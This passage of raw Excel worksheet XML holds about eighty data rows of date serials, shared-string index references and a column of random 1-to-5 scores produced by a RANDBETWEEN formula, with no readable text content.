        <f t="shared" ca="1" si="305"/>
        <v>5</v>
      </c>
    </row>
    <row r="19566" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A19566" s="1">
        <v>43138.590416666666</v>
      </c>
      <c r="C19566" t="s">
        <v>10</v>
      </c>
      <c r="D19566" t="s">
        <v>36</v>
      </c>
      <c r="E19566" s="2" t="s">
        <v>17553</v>
      </c>
      <c r="F19566">
        <f t="shared" ca="1" si="305"/>
        <v>5</v>
      </c>
    </row>
    <row r="19567" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19567" s="1">
        <v>43138.575833333336</v>
      </c>
      <c r="C19567" t="s">
        <v>10</v>
      </c>
      <c r="D19567" t="s">
        <v>192</v>
      </c>
      <c r="E19567" t="s">
        <v>17554</v>
      </c>
      <c r="F19567">
        <f t="shared" ca="1" si="305"/>
        <v>4</v>
      </c>
    </row>
    <row r="19568" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A19568" s="1">
        <v>43138.55945601852</v>
      </c>
      <c r="C19568" t="s">
        <v>10</v>
      </c>
      <c r="D19568" t="s">
        <v>52</v>
      </c>
      <c r="E19568" s="2" t="s">
        <v>17555</v>
      </c>
      <c r="F19568">
        <f t="shared" ca="1" si="305"/>
        <v>5</v>
      </c>
    </row>
    <row r="19569" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A19569" s="1">
        <v>43138.551261574074</v>
      </c>
      <c r="C19569" t="s">
        <v>10</v>
      </c>
      <c r="D19569" t="s">
        <v>46</v>
      </c>
      <c r="E19569" s="2" t="s">
        <v>17556</v>
      </c>
      <c r="F19569">
        <f t="shared" ca="1" si="305"/>
        <v>4</v>
      </c>
    </row>
    <row r="19570" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A19570" s="1">
        <v>43138.545081018521</v>
      </c>
      <c r="C19570" t="s">
        <v>48</v>
      </c>
      <c r="E19570" s="2" t="s">
        <v>17557</v>
      </c>
      <c r="F19570">
        <f t="shared" ca="1" si="305"/>
        <v>5</v>
      </c>
    </row>
    <row r="19571" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19571" s="1">
        <v>43138.530601851853</v>
      </c>
      <c r="C19571" t="s">
        <v>6</v>
      </c>
      <c r="D19571" t="s">
        <v>821</v>
      </c>
      <c r="E19571" t="s">
        <v>17558</v>
      </c>
      <c r="F19571">
        <f t="shared" ca="1" si="305"/>
        <v>1</v>
      </c>
    </row>
    <row r="19572" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A19572" s="1">
        <v>43138.528819444444</v>
      </c>
      <c r="C19572" t="s">
        <v>10</v>
      </c>
      <c r="D19572" t="s">
        <v>20</v>
      </c>
      <c r="E19572" s="2" t="s">
        <v>17559</v>
      </c>
      <c r="F19572">
        <f t="shared" ca="1" si="305"/>
        <v>3</v>
      </c>
    </row>
    <row r="19573" spans="1:6" ht="390" x14ac:dyDescent="0.25">
      <c r="A19573" s="1">
        <v>43138.512696759259</v>
      </c>
      <c r="C19573" t="s">
        <v>173</v>
      </c>
      <c r="E19573" s="2" t="s">
        <v>17560</v>
      </c>
      <c r="F19573">
        <f t="shared" ca="1" si="305"/>
        <v>2</v>
      </c>
    </row>
    <row r="19574" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19574" s="1">
        <v>43138.500474537039</v>
      </c>
      <c r="C19574" t="s">
        <v>10</v>
      </c>
      <c r="D19574" t="s">
        <v>494</v>
      </c>
      <c r="E19574" t="s">
        <v>17561</v>
      </c>
      <c r="F19574">
        <f t="shared" ca="1" si="305"/>
        <v>4</v>
      </c>
    </row>
    <row r="19575" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19575" s="1">
        <v>43138.481493055559</v>
      </c>
      <c r="C19575" t="s">
        <v>10</v>
      </c>
      <c r="E19575" t="s">
        <v>17562</v>
      </c>
      <c r="F19575">
        <f t="shared" ca="1" si="305"/>
        <v>5</v>
      </c>
    </row>
    <row r="19576" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19576" s="1">
        <v>43138.479224537034</v>
      </c>
      <c r="C19576" t="s">
        <v>10</v>
      </c>
      <c r="D19576" t="s">
        <v>6</v>
      </c>
      <c r="E19576" t="s">
        <v>17563</v>
      </c>
      <c r="F19576">
        <f t="shared" ca="1" si="305"/>
        <v>2</v>
      </c>
    </row>
    <row r="19577" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19577" s="1">
        <v>43138.40488425926</v>
      </c>
      <c r="C19577" t="s">
        <v>10</v>
      </c>
      <c r="D19577" t="s">
        <v>56</v>
      </c>
      <c r="E19577" t="s">
        <v>17564</v>
      </c>
      <c r="F19577">
        <f t="shared" ca="1" si="305"/>
        <v>1</v>
      </c>
    </row>
    <row r="19578" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A19578" s="1">
        <v>43138.400266203702</v>
      </c>
      <c r="C19578" t="s">
        <v>559</v>
      </c>
      <c r="E19578" s="2" t="s">
        <v>17565</v>
      </c>
      <c r="F19578">
        <f t="shared" ca="1" si="305"/>
        <v>3</v>
      </c>
    </row>
    <row r="19579" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19579" s="1">
        <v>43138.389722222222</v>
      </c>
      <c r="C19579" t="s">
        <v>10</v>
      </c>
      <c r="D19579" t="s">
        <v>112</v>
      </c>
      <c r="E19579" t="s">
        <v>17566</v>
      </c>
      <c r="F19579">
        <f t="shared" ca="1" si="305"/>
        <v>4</v>
      </c>
    </row>
    <row r="19580" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19580" s="1">
        <v>43138.388229166667</v>
      </c>
      <c r="C19580" t="s">
        <v>260</v>
      </c>
      <c r="E19580" t="s">
        <v>17567</v>
      </c>
      <c r="F19580">
        <f t="shared" ca="1" si="305"/>
        <v>3</v>
      </c>
    </row>
    <row r="19581" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19581" s="1">
        <v>43138.380312499998</v>
      </c>
      <c r="C19581" t="s">
        <v>10</v>
      </c>
      <c r="D19581" t="s">
        <v>494</v>
      </c>
      <c r="E19581" t="s">
        <v>17568</v>
      </c>
      <c r="F19581">
        <f t="shared" ca="1" si="305"/>
        <v>5</v>
      </c>
    </row>
    <row r="19582" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A19582" s="1">
        <v>43138.378564814811</v>
      </c>
      <c r="C19582" t="s">
        <v>10</v>
      </c>
      <c r="D19582" t="s">
        <v>263</v>
      </c>
      <c r="E19582" s="2" t="s">
        <v>17569</v>
      </c>
      <c r="F19582">
        <f t="shared" ca="1" si="305"/>
        <v>4</v>
      </c>
    </row>
    <row r="19583" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19583" s="1">
        <v>43138.371932870374</v>
      </c>
      <c r="C19583" t="s">
        <v>10</v>
      </c>
      <c r="D19583" t="s">
        <v>263</v>
      </c>
      <c r="E19583" t="s">
        <v>17570</v>
      </c>
      <c r="F19583">
        <f t="shared" ca="1" si="305"/>
        <v>4</v>
      </c>
    </row>
    <row r="19584" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19584" s="1">
        <v>43138.357812499999</v>
      </c>
      <c r="C19584" t="s">
        <v>749</v>
      </c>
      <c r="D19584" t="s">
        <v>52</v>
      </c>
      <c r="E19584" t="s">
        <v>17571</v>
      </c>
      <c r="F19584">
        <f t="shared" ca="1" si="305"/>
        <v>1</v>
      </c>
    </row>
    <row r="19585" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A19585" s="1">
        <v>43138.349224537036</v>
      </c>
      <c r="C19585" t="s">
        <v>41</v>
      </c>
      <c r="E19585" s="2" t="s">
        <v>17572</v>
      </c>
      <c r="F19585">
        <f t="shared" ca="1" si="305"/>
        <v>3</v>
      </c>
    </row>
    <row r="19586" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19586" s="1">
        <v>43138.348217592589</v>
      </c>
      <c r="C19586" t="s">
        <v>10</v>
      </c>
      <c r="D19586" t="s">
        <v>112</v>
      </c>
      <c r="E19586" t="s">
        <v>17573</v>
      </c>
      <c r="F19586">
        <f t="shared" ref="F19586:F19649" ca="1" si="306">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="19587" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A19587" s="1">
        <v>43138.325196759259</v>
      </c>
      <c r="C19587" t="s">
        <v>197</v>
      </c>
      <c r="E19587" s="2" t="s">
        <v>17574</v>
      </c>
      <c r="F19587">
        <f t="shared" ca="1" si="306"/>
        <v>2</v>
      </c>
    </row>
    <row r="19588" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19588" s="1">
        <v>43138.264363425929</v>
      </c>
      <c r="C19588" t="s">
        <v>41</v>
      </c>
      <c r="E19588" s="2" t="s">
        <v>17575</v>
      </c>
      <c r="F19588">
        <f t="shared" ca="1" si="306"/>
        <v>5</v>
      </c>
    </row>
    <row r="19589" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A19589" s="1">
        <v>43138.225462962961</v>
      </c>
      <c r="C19589" t="s">
        <v>71</v>
      </c>
      <c r="E19589" s="2" t="s">
        <v>17576</v>
      </c>
      <c r="F19589">
        <f t="shared" ca="1" si="306"/>
        <v>3</v>
      </c>
    </row>
    <row r="19590" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A19590" s="1">
        <v>43138.197893518518</v>
      </c>
      <c r="C19590" t="s">
        <v>71</v>
      </c>
      <c r="E19590" s="2" t="s">
        <v>17577</v>
      </c>
      <c r="F19590">
        <f t="shared" ca="1" si="306"/>
        <v>2</v>
      </c>
    </row>
    <row r="19591" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A19591" s="1">
        <v>43138.173506944448</v>
      </c>
      <c r="C19591" t="s">
        <v>10</v>
      </c>
      <c r="D19591" t="s">
        <v>36</v>
      </c>
      <c r="E19591" s="2" t="s">
        <v>17578</v>
      </c>
      <c r="F19591">
        <f t="shared" ca="1" si="306"/>
        <v>1</v>
      </c>
    </row>
    <row r="19592" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19592" s="1">
        <v>43138.142245370371</v>
      </c>
      <c r="C19592" t="s">
        <v>41</v>
      </c>
      <c r="E19592" t="s">
        <v>17579</v>
      </c>
      <c r="F19592">
        <f t="shared" ca="1" si="306"/>
        <v>1</v>
      </c>
    </row>
    <row r="19593" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19593" s="1">
        <v>43138.142245370371</v>
      </c>
      <c r="C19593" t="s">
        <v>41</v>
      </c>
      <c r="E19593" t="s">
        <v>17579</v>
      </c>
      <c r="F19593">
        <f t="shared" ca="1" si="306"/>
        <v>1</v>
      </c>
    </row>
    <row r="19594" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A19594" s="1">
        <v>43138.099386574075</v>
      </c>
      <c r="C19594" t="s">
        <v>140</v>
      </c>
      <c r="D19594" t="s">
        <v>234</v>
      </c>
      <c r="E19594" s="2" t="s">
        <v>17580</v>
      </c>
      <c r="F19594">
        <f t="shared" ca="1" si="306"/>
        <v>3</v>
      </c>
    </row>
    <row r="19595" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A19595" s="1">
        <v>43138.041238425925</v>
      </c>
      <c r="C19595" t="s">
        <v>845</v>
      </c>
      <c r="E19595" s="2" t="s">
        <v>17581</v>
      </c>
      <c r="F19595">
        <f t="shared" ca="1" si="306"/>
        <v>4</v>
      </c>
    </row>
    <row r="19596" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19596" s="1">
        <v>43137.983981481484</v>
      </c>
      <c r="C19596" t="s">
        <v>197</v>
      </c>
      <c r="E19596" t="s">
        <v>17582</v>
      </c>
      <c r="F19596">
        <f t="shared" ca="1" si="306"/>
        <v>4</v>
      </c>
    </row>
    <row r="19597" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19597" s="1">
        <v>43137.971921296295</v>
      </c>
      <c r="C19597" t="s">
        <v>301</v>
      </c>
      <c r="E19597" t="s">
        <v>17583</v>
      </c>
      <c r="F19597">
        <f t="shared" ca="1" si="306"/>
        <v>1</v>
      </c>
    </row>
    <row r="19598" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19598" s="1">
        <v>43137.81894675926</v>
      </c>
      <c r="C19598" t="s">
        <v>140</v>
      </c>
      <c r="D19598" t="s">
        <v>234</v>
      </c>
      <c r="E19598" t="s">
        <v>17584</v>
      </c>
      <c r="F19598">
        <f t="shared" ca="1" si="306"/>
        <v>5</v>
      </c>
    </row>
    <row r="19599" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19599" s="1">
        <v>43137.80982638889</v>
      </c>
      <c r="C19599" t="s">
        <v>4852</v>
      </c>
      <c r="E19599" t="s">
        <v>17585</v>
      </c>
      <c r="F19599">
        <f t="shared" ca="1" si="306"/>
        <v>4</v>
      </c>
    </row>
    <row r="19600" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19600" s="1">
        <v>43137.799456018518</v>
      </c>
      <c r="C19600" t="s">
        <v>144</v>
      </c>
      <c r="E19600" t="s">
        <v>17586</v>
      </c>
      <c r="F19600">
        <f t="shared" ca="1" si="306"/>
        <v>5</v>
      </c>
    </row>
    <row r="19601" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19601" s="1">
        <v>43137.798263888886</v>
      </c>
      <c r="C19601" t="s">
        <v>3443</v>
      </c>
      <c r="D19601" t="s">
        <v>67</v>
      </c>
      <c r="E19601" s="2" t="s">
        <v>17587</v>
      </c>
      <c r="F19601">
        <f t="shared" ca="1" si="306"/>
        <v>4</v>
      </c>
    </row>
    <row r="19602" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19602" s="1">
        <v>43137.779097222221</v>
      </c>
      <c r="C19602" t="s">
        <v>14</v>
      </c>
      <c r="D19602" t="s">
        <v>36</v>
      </c>
      <c r="E19602" t="s">
        <v>17588</v>
      </c>
      <c r="F19602">
        <f t="shared" ca="1" si="306"/>
        <v>5</v>
      </c>
    </row>
    <row r="19603" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19603" s="1">
        <v>43137.772974537038</v>
      </c>
      <c r="C19603" t="s">
        <v>10</v>
      </c>
      <c r="D19603" t="s">
        <v>46</v>
      </c>
      <c r="E19603" t="s">
        <v>17589</v>
      </c>
      <c r="F19603">
        <f t="shared" ca="1" si="306"/>
        <v>1</v>
      </c>
    </row>
    <row r="19604" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19604" s="1">
        <v>43137.748576388891</v>
      </c>
      <c r="C19604" t="s">
        <v>10</v>
      </c>
      <c r="D19604" t="s">
        <v>89</v>
      </c>
      <c r="E19604" t="s">
        <v>17590</v>
      </c>
      <c r="F19604">
        <f t="shared" ca="1" si="306"/>
        <v>4</v>
      </c>
    </row>
    <row r="19605" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A19605" s="1">
        <v>43137.747569444444</v>
      </c>
      <c r="C19605" t="s">
        <v>6</v>
      </c>
      <c r="D19605" t="s">
        <v>114</v>
      </c>
      <c r="E19605" s="2" t="s">
        <v>17591</v>
      </c>
      <c r="F19605">
        <f t="shared" ca="1" si="306"/>
        <v>4</v>
      </c>
    </row>
    <row r="19606" spans="1:6" ht="375" x14ac:dyDescent="0.25">
      <c r="A19606" s="1">
        <v>43137.739120370374</v>
      </c>
      <c r="C19606" t="s">
        <v>10</v>
      </c>
      <c r="D19606" t="s">
        <v>6</v>
      </c>
      <c r="E19606" s="2" t="s">
        <v>17592</v>
      </c>
      <c r="F19606">
        <f t="shared" ca="1" si="306"/>
        <v>4</v>
      </c>
    </row>
    <row r="19607" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19607" s="1">
        <v>43137.733136574076</v>
      </c>
      <c r="C19607" t="s">
        <v>127</v>
      </c>
      <c r="D19607" t="s">
        <v>124</v>
      </c>
      <c r="E19607" t="s">
        <v>17593</v>
      </c>
      <c r="F19607">
        <f t="shared" ca="1" si="306"/>
        <v>3</v>
      </c>
    </row>
    <row r="19608" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19608" s="1">
        <v>43137.686550925922</v>
      </c>
      <c r="C19608" t="s">
        <v>10</v>
      </c>
      <c r="D19608" t="s">
        <v>20</v>
      </c>
      <c r="E19608" t="s">
        <v>17594</v>
      </c>
      <c r="F19608">
        <f t="shared" ca="1" si="306"/>
        <v>3</v>
      </c>
    </row>
    <row r="19609" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19609" s="1">
        <v>43137.659131944441</v>
      </c>
      <c r="C19609" t="s">
        <v>10</v>
      </c>
      <c r="D19609" t="s">
        <v>374</v>
      </c>
      <c r="E19609" t="s">
        <v>17595</v>
      </c>
      <c r="F19609">
        <f t="shared" ca="1" si="306"/>
        <v>4</v>
      </c>
    </row>
    <row r="19610" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A19610" s="1">
        <v>43137.644895833335</v>
      </c>
      <c r="C19610" t="s">
        <v>454</v>
      </c>
      <c r="D19610" t="s">
        <v>86</v>
      </c>
      <c r="E19610" s="2" t="s">
        <v>17596</v>
      </c>
      <c r="F19610">
        <f t="shared" ca="1" si="306"/>
        <v>3</v>
      </c>
    </row>
    <row r="19611" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A19611" s="1">
        <v>43137.57912037037</v>
      </c>
      <c r="C19611" t="s">
        <v>6</v>
      </c>
      <c r="D19611" t="s">
        <v>25</v>
      </c>
      <c r="E19611" s="2" t="s">
        <v>17597</v>
      </c>
      <c r="F19611">
        <f t="shared" ca="1" si="306"/>
        <v>4</v>
      </c>
    </row>
    <row r="19612" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19612" s="1">
        <v>43137.557928240742</v>
      </c>
      <c r="C19612" t="s">
        <v>10</v>
      </c>
      <c r="D19612" t="s">
        <v>89</v>
      </c>
      <c r="E19612" t="s">
        <v>17598</v>
      </c>
      <c r="F19612">
        <f t="shared" ca="1" si="306"/>
        <v>4</v>
      </c>
    </row>
    <row r="19613" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19613" s="1">
        <v>43137.55736111111</v>
      </c>
      <c r="C19613" t="s">
        <v>6</v>
      </c>
      <c r="D19613" t="s">
        <v>25</v>
      </c>
      <c r="E19613" t="s">
        <v>17599</v>
      </c>
      <c r="F19613">
        <f t="shared" ca="1" si="306"/>
        <v>5</v>
      </c>
    </row>
    <row r="19614" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19614" s="1">
        <v>43137.535636574074</v>
      </c>
      <c r="C19614" t="s">
        <v>10</v>
      </c>
      <c r="D19614" t="s">
        <v>6</v>
      </c>
      <c r="E19614" t="s">
        <v>17600</v>
      </c>
      <c r="F19614">
        <f t="shared" ca="1" si="306"/>
        <v>2</v>
      </c>
    </row>
    <row r="19615" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19615" s="1">
        <v>43137.528506944444</v>
      </c>
      <c r="C19615" t="s">
        <v>6</v>
      </c>
      <c r="D19615" t="s">
        <v>821</v>
      </c>
      <c r="E19615" t="s">
        <v>17601</v>
      </c>
      <c r="F19615">
        <f t="shared" ca="1" si="306"/>
        <v>2</v>
      </c>
    </row>
    <row r="19616" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19616" s="1">
        <v>43137.521863425929</v>
      </c>
      <c r="C19616" t="s">
        <v>10</v>
      </c>
      <c r="D19616" t="s">
        <v>23</v>
      </c>
      <c r="E19616" t="s">
        <v>17602</v>
      </c>
      <c r="F19616">
        <f t="shared" ca="1" si="306"/>
        <v>1</v>
      </c>
    </row>
    <row r="19617" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19617" s="1">
        <v>43137.512037037035</v>
      </c>
      <c r="C19617" t="s">
        <v>48</v>
      </c>
      <c r="E19617" t="s">
        <v>17603</v>
      </c>
      <c r="F19617">
        <f t="shared" ca="1" si="306"/>
        <v>3</v>
      </c>
    </row>
    <row r="19618" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A19618" s="1">
        <v>43137.50582175926</v>
      </c>
      <c r="C19618" t="s">
        <v>65</v>
      </c>
      <c r="E19618" s="2" t="s">
        <v>17604</v>
      </c>
      <c r="F19618">
        <f t="shared" ca="1" si="306"/>
        <v>1</v>
      </c>
    </row>
    <row r="19619" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19619" s="1">
        <v>43137.47252314815</v>
      </c>
      <c r="C19619" t="s">
        <v>73</v>
      </c>
      <c r="E19619" t="s">
        <v>17605</v>
      </c>
      <c r="F19619">
        <f t="shared" ca="1" si="306"/>
        <v>1</v>
      </c>
    </row>
    <row r="19620" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A19620" s="1">
        <v>43137.470034722224</v>
      </c>
      <c r="C19620" t="s">
        <v>10</v>
      </c>
      <c r="D19620" t="s">
        <v>158</v>
      </c>
      <c r="E19620" s="2" t="s">
        <v>17606</v>
      </c>
      <c r="F19620">
        <f t="shared" ca="1" si="306"/>
        <v>5</v>
      </c>
    </row>
    <row r="19621" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19621" s="1">
        <v>43137.44902777778</v>
      </c>
      <c r="C19621" t="s">
        <v>134</v>
      </c>
      <c r="E19621" t="s">
        <v>17607</v>
      </c>
      <c r="F19621">
        <f t="shared" ca="1" si="306"/>
        <v>5</v>
      </c>
    </row>
    <row r="19622" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A19622" s="1">
        <v>43137.448263888888</v>
      </c>
      <c r="C19622" t="s">
        <v>6</v>
      </c>
      <c r="D19622" t="s">
        <v>194</v>
      </c>
      <c r="E19622" s="2" t="s">
        <v>17608</v>
      </c>
      <c r="F19622">
        <f t="shared" ca="1" si="306"/>
        <v>3</v>
      </c>
    </row>
    <row r="19623" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A19623" s="1">
        <v>43137.440034722225</v>
      </c>
      <c r="C19623" t="s">
        <v>48</v>
      </c>
      <c r="E19623" s="2" t="s">
        <v>17609</v>
      </c>
      <c r="F19623">
        <f t="shared" ca="1" si="306"/>
        <v>4</v>
      </c>
    </row>
    <row r="19624" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19624" s="1">
        <v>43137.410567129627</v>
      </c>
      <c r="C19624" t="s">
        <v>10</v>
      </c>
      <c r="D19624" t="s">
        <v>1160</v>
      </c>
      <c r="E19624" t="s">
        <v>17610</v>
      </c>
      <c r="F19624">
        <f t="shared" ca="1" si="306"/>
        <v>3</v>
      </c>
    </row>
    <row r="19625" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A19625" s="1">
        <v>43137.406504629631</v>
      </c>
      <c r="C19625" t="s">
        <v>73</v>
      </c>
      <c r="E19625" s="2" t="s">
        <v>17611</v>
      </c>
      <c r="F19625">
        <f t="shared" ca="1" si="306"/>
        <v>5</v>
      </c>
    </row>
    <row r="19626" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19626" s="1">
        <v>43137.384814814817</v>
      </c>
      <c r="C19626" t="s">
        <v>10</v>
      </c>
      <c r="D19626" t="s">
        <v>11</v>
      </c>
      <c r="E19626" t="s">
        <v>17612</v>
      </c>
      <c r="F19626">
        <f t="shared" ca="1" si="306"/>
        <v>4</v>
      </c>
    </row>
    <row r="19627" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19627" s="1">
        <v>43137.375254629631</v>
      </c>
      <c r="C19627" t="s">
        <v>48</v>
      </c>
      <c r="D19627" t="s">
        <v>312</v>
      </c>
      <c r="E19627" t="s">
        <v>17613</v>
      </c>
      <c r="F19627">
        <f t="shared" ca="1" si="306"/>
        <v>4</v>
      </c>
    </row>
    <row r="19628" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A19628" s="1">
        <v>43137.344074074077</v>
      </c>
      <c r="C19628" t="s">
        <v>65</v>
      </c>
      <c r="E19628" s="2" t="s">
        <v>17614</v>
      </c>
      <c r="F19628">
        <f t="shared" ca="1" si="306"/>
        <v>2</v>
      </c>
    </row>
    <row r="19629" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19629" s="1">
        <v>43137.331331018519</v>
      </c>
      <c r="C19629" t="s">
        <v>10</v>
      </c>
      <c r="D19629" t="s">
        <v>112</v>
      </c>
      <c r="E19629" t="s">
        <v>17615</v>
      </c>
      <c r="F19629">
        <f t="shared" ca="1" si="306"/>
        <v>3</v>
      </c>
    </row>
    <row r="19630" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19630" s="1">
        <v>43137.320914351854</v>
      </c>
      <c r="C19630" t="s">
        <v>6</v>
      </c>
      <c r="D19630" t="s">
        <v>25</v>
      </c>
      <c r="E19630" t="s">
        <v>17616</v>
      </c>
      <c r="F19630">
        <f t="shared" ca="1" si="306"/>
        <v>4</v>
      </c>
    </row>
    <row r="19631" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19631" s="1">
        <v>43137.314942129633</v>
      </c>
      <c r="C19631" t="s">
        <v>10</v>
      </c>
      <c r="D19631" t="s">
        <v>271</v>
      </c>
      <c r="E19631" t="s">
        <v>17617</v>
      </c>
      <c r="F19631">
        <f t="shared" ca="1" si="306"/>
        <v>2</v>
      </c>
    </row>
    <row r="19632" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19632" s="1">
        <v>43137.301041666666</v>
      </c>
      <c r="C19632" t="s">
        <v>10</v>
      </c>
      <c r="D19632" t="s">
        <v>56</v>
      </c>
      <c r="F19632">
        <f t="shared" ca="1" si="306"/>
        <v>4</v>
      </c>
    </row>
    <row r="19633" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19633" s="1">
        <v>43137.278252314813</v>
      </c>
      <c r="C19633" t="s">
        <v>10735</v>
      </c>
      <c r="D19633" t="s">
        <v>92</v>
      </c>
      <c r="E19633" t="s">
        <v>17618</v>
      </c>
      <c r="F19633">
        <f t="shared" ca="1" si="306"/>
        <v>5</v>
      </c>
    </row>
    <row r="19634" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19634" s="1">
        <v>43137.230231481481</v>
      </c>
      <c r="C19634" t="s">
        <v>41</v>
      </c>
      <c r="E19634" t="s">
        <v>17619</v>
      </c>
      <c r="F19634">
        <f t="shared" ca="1" si="306"/>
        <v>5</v>
      </c>
    </row>
    <row r="19635" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A19635" s="1">
        <v>43137.220763888887</v>
      </c>
      <c r="C19635" t="s">
        <v>189</v>
      </c>
      <c r="D19635" t="s">
        <v>112</v>
      </c>
      <c r="E19635" s="2" t="s">
        <v>17620</v>
      </c>
      <c r="F19635">
        <f t="shared" ca="1" si="306"/>
        <v>4</v>
      </c>
    </row>
    <row r="19636" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A19636" s="1">
        <v>43137.216550925928</v>
      </c>
      <c r="C19636" t="s">
        <v>71</v>
      </c>
      <c r="E19636" s="2" t="s">
        <v>17621</v>
      </c>
      <c r="F19636">
        <f t="shared" ca="1" si="306"/>
        <v>5</v>
      </c>
    </row>
    <row r="19637" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A19637" s="1">
        <v>43137.211967592593</v>
      </c>
      <c r="C19637" t="s">
        <v>103</v>
      </c>
      <c r="E19637" s="2" t="s">
        <v>17622</v>
      </c>
      <c r="F19637">
        <f t="shared" ca="1" si="306"/>
        <v>3</v>
      </c>
    </row>
    <row r="19638" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A19638" s="1">
        <v>43137.142858796295</v>
      </c>
      <c r="C19638" t="s">
        <v>2210</v>
      </c>
      <c r="E19638" s="2" t="s">
        <v>17623</v>
      </c>
      <c r="F19638">
        <f t="shared" ca="1" si="306"/>
        <v>1</v>
      </c>
    </row>
    <row r="19639" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A19639" s="1">
        <v>43137.115694444445</v>
      </c>
      <c r="C19639" t="s">
        <v>41</v>
      </c>
      <c r="E19639" s="2" t="s">
        <v>17624</v>
      </c>
      <c r="F19639">
        <f t="shared" ca="1" si="306"/>
        <v>2</v>
      </c>
    </row>
    <row r="19640" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19640" s="1">
        <v>43137.096435185187</v>
      </c>
      <c r="C19640" t="s">
        <v>318</v>
      </c>
      <c r="E19640" t="s">
        <v>17625</v>
      </c>
      <c r="F19640">
        <f t="shared" ca="1" si="306"/>
        <v>2</v>
      </c>
    </row>
    <row r="19641" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19641" s="1">
        <v>43137.085613425923</v>
      </c>
      <c r="C19641" t="s">
        <v>41</v>
      </c>
      <c r="E19641" t="s">
        <v>17626</v>
      </c>
      <c r="F19641">
        <f t="shared" ca="1" si="306"/>
        <v>1</v>
      </c>
    </row>
    <row r="19642" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A19642" s="1">
        <v>43137.062175925923</v>
      </c>
      <c r="C19642" t="s">
        <v>10</v>
      </c>
      <c r="D19642" t="s">
        <v>36</v>
      </c>
      <c r="E19642" s="2" t="s">
        <v>17627</v>
      </c>
      <c r="F19642">
        <f t="shared" ca="1" si="306"/>
        <v>5</v>
      </c>
    </row>
    <row r="19643" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19643" s="1">
        <v>43137.014872685184</v>
      </c>
      <c r="C19643" t="s">
        <v>41</v>
      </c>
      <c r="E19643" t="s">
        <v>17628</v>
      </c>
      <c r="F19643">
        <f t="shared" ca="1" si="306"/>
        <v>3</v>
      </c>
    </row>
